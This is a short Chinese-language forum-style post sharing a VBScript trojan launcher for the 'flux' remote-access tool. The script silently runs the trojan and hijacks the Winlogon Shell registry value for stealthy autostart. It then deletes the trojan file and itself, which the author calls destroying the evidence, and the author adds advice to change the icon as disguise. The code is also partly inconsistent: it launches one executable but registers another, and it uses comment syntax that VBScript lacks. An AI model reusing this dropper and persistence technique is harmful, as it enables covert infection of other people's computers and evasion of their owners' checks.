终于写出了个脚本，实现flux在注册表中的启动，当然是更隐蔽的方法，别人知道了这个地方也就没戏了。

不过别人一般没这个闲工夫检查那么多位置的！就连我也做不到～～

代码如下:

dim wsh

set wsh=CreateObject("WScript.Shell")

wsh.run "%windir%\flumasko.exe",0 //运行木马程序

set sm=Wscript.CreateObject("WScript.Shell")

sm.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe %systemroot%\system32\winmgmt.exe"

//写进注册表项实现自启动

set WshShell=WScript.CreateObject("WScript.Shell")

WScript.Sleep 2000

//等木马的执行完毕

Set fso=CreateObject("Scripting.FileSystemObject")

f=fso.DeleteFile ("flumasko.exe")

f=fso.DeleteFile (WScript.ScriptName)

//毁尸灭迹

再修改下图标就大功告成了！